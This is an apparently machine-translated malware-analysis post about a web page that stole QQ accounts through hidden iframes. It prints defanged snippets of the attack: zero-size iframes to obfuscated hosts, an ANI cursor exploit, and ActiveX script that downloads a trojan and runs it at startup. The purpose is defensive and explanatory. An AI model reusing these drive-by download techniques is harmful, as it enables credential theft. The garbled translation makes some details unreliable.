Be careful! I used Baidu to search for lost music. QQ was originally set up with Trojan. psw. win32.qqpass. QIS.

Source: Internet
Author: User

EndurerOriginal
1Version

One user reported that he used Baidu to search for music. After he opened the link webpage in the search result, his QQ number was stolen ~

BTW. sogou is used for music searching ~

Check the webpage provided by netizens and find the webpage contains code:

/---
<IFRAME src = 'hxxp: // W **. c ** yshop.net/gg.html? Id = 101 'width = 0 Height = 0> </iframe>
---/

Hxxp: // W **. c ** yshop.net/gg.html? Id = 101Contains three malicious codes.

1. Content of US-ASCII Encoding

Download the http://purpleendurer.ys168.com decoder to the US-ASCII for decoding and get a piece of HTML code:

/---
<Body style = 'cursor: URL (hxxp: // * Q *. 16 *** 80*8 * 0.com/#js) '>
</Body>
---/

W. jsUse the ani vulnerability to download hxxp: // W **. d ** zy5 *** unzip com/0.exe

File Description: D:/test/0.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 21:55:38
Modification time: 21:55:44
Access time:
Size: 22807 bytes, 22.279 KB
MD5: 08a5179fc115b3ace5c9a4ac55ed4c44
Kaspersky reportsTrojan-PSW.Win32.Delf.qcThe rising report isTrojan. psw. win32.qqpass. QIS

Ii. HTML code:
/---
<IFRAME src = "hxxp: // Q **. Z ** p * X5 ** 2 * 0.com/1.htm" width = 0 Height = 0> </iframe>
---/

1. htmThe content uses the US-ASCII encoding, decoding, get a piece of JavaScript code, the function is also download ghost this 0.exe

Iii. HTML code:
/---
<IFRAME src = "hxxp: // Q **. Z ** p * X5 ** 2 * 0.com/vip.htm" width = 0 Height = 0> </iframe>
---/

Hxxp: // Q **. Z ** p * X5 ** 2 * 0.com/vip.htmContent:
/---
<SCRIPT src = "VIP. js"> </SCRIPT>
<Body onload = shit ();> <br>
---/
Shit () is defined in VIP. JS:
/---
Function shit ()
{
Try {qianxu_fan = new activexobject ("thunderserver. webthunder.1 ");}
Catch (e) {return ;}
---/
Used to create ActiveX Object: thunderserver. webthunder.1.

VIP. jsImplementation using it:
Use ADODB to create a file: C:/Documents and Settings/all users/Start Menu/Program/start/Microsofts. HTA
Use shell. Run to call IE to open the webpage hxxp: // Q **. d ** Z ** y ** 5 *** unzip com/vips.htmand download the Virus File vip.exe
Use shell.execto run the Virus File vip5111).exe that is downloaded to the IE folder.

Hxxp: // Q **. D * z ** y ** 5 *** restart com/vips.htmCode included:
/---
<SCRIPT src = "vip.exe"> </SCRIPT>
---/

Vip.exe is the same as 0.exe.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.